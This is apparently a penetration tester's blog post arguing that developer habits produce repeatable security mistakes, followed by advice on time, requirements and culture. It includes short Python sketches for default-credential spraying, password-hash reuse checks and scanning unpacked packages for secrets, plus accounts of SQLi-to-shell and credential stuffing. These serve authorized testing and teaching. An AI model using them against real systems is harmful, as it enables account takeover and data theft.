Hi, Namaste, Hello, Hola, Kon’nichiwa.

So, I have been working in cybersecurity for almost two years now. I am a simple guy, at least when it comes to tech, and during this time I have picked up some simple lessons that have proved useful. I intend to share one of them in this post.

Almost every system is built by people, and people, at least in the masses, make mistakes, so almost every system can be broken once enough effort has been put in. This underlying tenet is one of the reasons we are seeing more and more cyberattacks across the industry. If someone puts in enough effort, they can somehow sneak their way inside even some of the most secure organizations’ systems. I say this from my own experience of red teaming projects that I have either been part of or watched other people execute.

Almost two years back, when I was starting my first formal web application assessment project at my first organization, I asked my manager for tips or a methodology. She said, plain and simple, “You just start testing. Once you start, you will face questions, and when you search for answers, you will create your own methodology.” One of the methods I discovered while searching for those answers is that, fundamentally, if you understand the behaviour of the person who built the thing you are trying to break, you can save tons of time and effort and narrow your search for weaknesses. Here are some examples:

  • In one of the organizations whose assets we were testing as part of a red teaming activity, we found tons and tons of web applications from third-party vendors. While bruteforcing the password for the admin user on one of their portals (a native one, not from any third-party vendor), we found it was using the default credentials admin:admin. We thought, what if this behaviour persists? If a single citizen has a habit, chances are he learnt it from the kingdom. So we picked out the third-party platforms from our web screenshots and then, one by one, scoured the vendors’ documentation and developer platforms for default credentials (a minimal sketch of this kind of default-credential check follows this list). Bingo, we got into five portals, one of which was used to manage the structure, security policies, and databases of multiple other websites. It also contained loads of keys. Within the next few hours, we had searched through the keys and, Holy Smokes, we had access to their Azure Storage.
  • On another red teaming project, we noticed that the client was using systems built by a vendor a long time ago. An SQLi was discovered, and an OS shell was obtained from one of their web apps. We started dumping databases with SQLMap. One day, two days; the whole thing went on for two weeks. Tons and tons of data, but mostly garbage (for us). And then we got our hands on some test source code. In it, we noticed that the developers were mostly storing passwords for a particular application database in plaintext. We dumped passwords from that database. Since the lead was good and the application surface small, we started credential stuffing, and bingo, one of the combinations worked. Then we remembered we had also found hashed passwords in the SQLMap dump, with mappings to some portals, one of which was the very portal we had just cracked. We thought, what if other managers were using similar passwords? We hashed the plaintext we had and matched it against four more users (see the hash-reuse sketch after this list). And ding, ding, ding, three more accounts down (one of the four no longer existed). We decided that whenever we notice someone storing plaintext credentials like this, we will go, we will see, and we will conquer.
  • In one of the web assessments we were attempting, the portal offered loads of installer packages for different operating systems. The application had been assessed at least three times in the past. Yeah, life as a cybersecurity professional can be good, but it is hard sometimes, and in some cases it can turn brutal too. :-( Since things were going tough and the client wanted findings, I thought about what kinds of mistakes can hide inside packages, so I extracted one Debian package. After four weeks, I slept peacefully that day. Not only did the package contain all the code in plaintext, it had hardcoded credentials and comments describing how the system was configured, which internal IP hosted what, and where the connections to the database began and ended. The dev team might have thought, who will ever unpack these? I knew that different teams in the client organization developed the packages for their respective OS, but what if everyone in the organization thought like that? After installing three more operating systems to extract the other packages and test the behaviour (to confirm whether what I was seeing was valid), my confidence as an analyst shot up: all the packages were similar to the Debian one (a sketch of this kind of package scan also follows this list). The next day, the client organization’s security manager asked me to report the findings with extra analysis, raise the severity, and add details about secure coding practices to the remediation.
  • I am a bit high on recon as well, as that was my first client project, and over the years I have realized that, done without focus, recon can go on forever. So we need to cut down the work and narrow our search to the areas that can be most impacted. I have also noticed that similar mistakes are common across organizations. I read a quote somewhere on the internet that went something like, “Individual insanity is rare, but in the masses it is the norm.” If you find one credential on Pastebin, chances are you will find ten more; if you find one request with sensitive data on codebeautify, chances are you will find many more. I have found people post the complete repositories of test applications on GitHub, and then the same test credentials from those repositories work on similar production applications.
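
Here is a minimal sketch of the default-credential spraying idea from the first story. Everything in it is illustrative: the portal URLs, the form field names, the credential lists, and the success heuristic are all assumptions, and anything like this needs written authorization before it touches a real target.

```python
# Hypothetical sketch: trying vendor default credentials across discovered
# portals. URLs, field names, and credential lists below are placeholders.
import requests

# (login URL, vendor) pairs gathered during recon -- illustrative only
PORTALS = [
    ("https://portal1.example.com/login", "vendorA"),
    ("https://portal2.example.com/login", "vendorB"),
]

# Default credentials pulled from each vendor's public documentation
DEFAULT_CREDS = {
    "vendorA": [("admin", "admin"), ("admin", "password")],
    "vendorB": [("root", "changeme")],
}

def try_login(url: str, username: str, password: str) -> bool:
    """Return True if the login form appears to accept the credentials."""
    resp = requests.post(
        url,
        data={"username": username, "password": password},
        timeout=10,
        allow_redirects=False,
    )
    # Crude heuristic: many apps redirect (302) on success and re-render
    # the login page (200) on failure; tune this per target.
    return resp.status_code == 302

for url, vendor in PORTALS:
    for user, pwd in DEFAULT_CREDS.get(vendor, []):
        if try_login(url, user, pwd):
            print(f"[+] {url} accepts default credentials {user}:{pwd}")
```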
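
And a sketch of the hash-reuse trick from the second story. I am assuming, purely for illustration, unsalted MD5 hashes; adjust the digest and any salting scheme to whatever the real dump uses. The first hash below really is md5("password"), so the snippet runs as-is.

```python
# Hypothetical sketch: once one plaintext/hash pair is cracked, check whether
# other users in the dump share the same password (assumes unsalted MD5).
import hashlib

KNOWN_PLAINTEXT = "password"  # recovered from the plaintext database

dumped_hashes = {  # user -> hash, as pulled from the SQLMap dump
    "manager1": "5f4dcc3b5aa765d61d8327deb882cf99",  # md5("password")
    "manager2": "d0763edaa9d9bd2a9516280e9044d885",  # placeholder hash
}

known_hash = hashlib.md5(KNOWN_PLAINTEXT.encode()).hexdigest()

for user, digest in dumped_hashes.items():
    if digest.lower() == known_hash:
        print(f"[+] {user} appears to reuse the cracked password")
```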
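
Finally, a sketch of the package inspection from the third story: unpack a Debian package and grep the payload for secrets. It assumes the dpkg-deb CLI is installed, the regexes are a tiny illustrative subset rather than a real secret scanner, and the filename is a placeholder.

```python
# Hypothetical sketch: extract a .deb and scan its files for hardcoded
# secrets, config comments, and internal IPs. Requires dpkg-deb on PATH.
import re
import subprocess
import tempfile
from pathlib import Path

SECRET_PATTERNS = [
    re.compile(r"(?i)password\s*[=:]\s*\S+"),
    re.compile(r"(?i)api[_-]?key\s*[=:]\s*\S+"),
    re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),  # IPs mentioned in comments
]

def scan_deb(deb_path: str) -> None:
    with tempfile.TemporaryDirectory() as tmp:
        # dpkg-deb -x unpacks the package's data archive into tmp
        subprocess.run(["dpkg-deb", "-x", deb_path, tmp], check=True)
        for path in Path(tmp).rglob("*"):
            if not path.is_file():
                continue
            text = path.read_text(errors="ignore")
            for pattern in SECRET_PATTERNS:
                for match in pattern.findall(text):
                    print(f"{path}: {match}")

scan_deb("package_under_test.deb")  # placeholder filename
```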

I hope the above examples convey the point I am trying to make. Developers are humans. Humans are creatures of habit. Developers work in teams, and habits grow stronger in teams; their mistakes can grow bigger in teams too. But is the converse also true? Can we reduce those mistakes with team habits? I certainly believe so.

From the tone and length of this post, you can guess I am talkative. Yeah, I can be shy at first, but once I start talking, you will get tired of listening. As President Lincoln once put it, “I could write shorter sermons, but when I get started I’m too lazy to stop.”

After every assessment, if I can, I like to talk to developers. Over several such assessments, I have learned a thing or two from them. Let’s start with why habits form.

I find that this can happen at three levels: the individual level, the team level, and the organization level. At all three levels, time, requirements, and culture are the main contributing factors. A brief answer to the ‘How?’ that just arose in your mind follows:

Time

Ask a philosopher, and he will tell you that time is the only real currency in the world. A lot of mistakes happen when we are short on time: pressure builds up, security takes a back seat, and your chances of landing in a messy situation become much higher. This applies to individuals, teams, and organizations as a whole. When your competitor is shipping products faster than you, you tend to run the engines at full throttle. That competitor can be another organization for an organization, a team in a similar department for a team, and another individual for an individual. Competition will never go away, and you will need to work under pressure. What you can do to avoid last-minute hassles is prioritize and plan. I will share an anecdote here.

In one application, I noticed widespread use of hardcoded keys. The application had been tested before, and I knew that was unusual for their applications. I was pretty friendly with the developer, so I asked him why. He said he had been working hard on that app for the last two sprints, often beyond office hours. At the last moment, just a day before the deadline, a new feature was requested. He had promised his wife a dinner date on completion of the project, in return for having ignored her because of work. Since time was of the essence, he simply put the keys in while debugging something and then forgot to take care of them later. Yeah, talk about loyalty: a man can ignore a job at a multi-million dollar company for his girl. You rule the world, girls. He further said this would never have happened if the project had been properly planned, features and all. But anyway, I got to report more bugs, so at least that was good, for me. Plan your project in advance, because if you repeat the cycle and security takes a back seat, after some time security will become habituated to being seated at the back. (A sketch of the usual quick fix for this habit follows.)
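
For what it’s worth, the standard cure for that particular habit is cheap: keep secrets out of the source and fail loudly when they are missing. A minimal sketch, with a made-up variable name:

```python
# Hypothetical sketch: read secrets from the environment (or a vault) instead
# of hardcoding them; refuse to start if the secret was never provided.
import os

def get_api_key() -> str:
    key = os.environ.get("PAYMENTS_API_KEY")  # illustrative variable name
    if not key:
        raise RuntimeError("PAYMENTS_API_KEY is not set; refusing to start")
    return key
```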

Requirements

Security should not be a secondary attribute of your product; it should be part of the main development process itself. Chalk out the security considerations, and have a security engineer present while you are planning the project and defining its requirements. Fixing bugs post-production consumes much, much more time and effort than minimizing them during development itself. As the age-old saying goes, prevention is better than cure. Take into consideration the cost of training your developers in security and of hiring security engineers when required, whether external or internal, and tell your finance department to consider it non-negotiable. Ask them whether they would rather spend a dollar on cybersecurity today or pay a thousand dollars to a hacker tomorrow. This applies to individuals as well. Ask your manager for support to learn more about developing secure systems. Ask that security engineer questions. If you can’t ask for that, then maybe you are in the wrong place, bro.

Culture

This is perhaps the most important. At the individual, team, and organization levels, enforce cybersecurity. Make sure everyone, from the kid who joined as an intern to the CEO, is not afraid to ask questions and take advice. Reward people who take it seriously, and I mean who really take it seriously, not those who only act like they do. I know that this can be difficult to measure as a metric, and I don’t have an answer for measuring or recognizing it, yet. When I rise up the ladder and find a good enough answer, I will update these lines. Letting people talk about security without fear can take you miles ahead. Another story here: I was talking to a friend, a junior developer at a company (let’s call it ABC), who had done his internship at another company and then joined ABC. He was working on a project led by someone who had shifted roles within ABC after three years. He told the project lead how he had learnt about cross-site scripting vulnerabilities at his previous company and the prevention measures that should be taken against them (a small illustration follows this section). His advice was not heeded; he felt it was because he was a junior and new to the company. Later, a security audit surfaced several instances of cross-site scripting. Ensure that the organization’s culture does not ignore the small voices. Everyone can bring something to the table.
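
For readers who have not met cross-site scripting before, the gist of the advice that went unheeded is simply: never splice raw user input into HTML. A minimal sketch using the Python standard library (real apps would lean on their template engine’s autoescaping):

```python
# Minimal illustration of reflected XSS and the escaping that prevents it.
import html

user_input = '<script>alert("xss")</script>'

# Vulnerable: the script tag lands in the page verbatim and executes
unsafe_page = f"<p>Hello, {user_input}</p>"

# Safer: special characters are encoded, so the browser renders them as text
safe_page = f"<p>Hello, {html.escape(user_input)}</p>"

print(safe_page)  # <p>Hello, &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</p>
```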

A few more things that can contribute to secure development are as follows:

  • Address developers’ biases: developers can have preferences; they can have anchoring bias, giving more weight to the information that comes first; they can be far too optimistic; and so on. While this can be very difficult to address, encouraging rationalism can surely help.
  • Avoid overestimating abilities: from teams to individuals, keep expectations ambitious, but real. That will help you plan better, execute better, and reward better.
  • To change behaviour, change the environment. Enable a culture amongst your colleagues, teams, and companies that helps people understand and implement security. If you are interested in how behavioural psychology works in software development, I found a brief but great blog post on it while reading and writing for this one.

Yup, that’s all for this post. I will keep updating it as and when I learn new things. Your suggestions are welcome.

Happy and Secure Development.

Let’s have a chat on Twitter: Abhishek

Also, feel free to reach out on any social media handles mentioned at the end of this blog page.

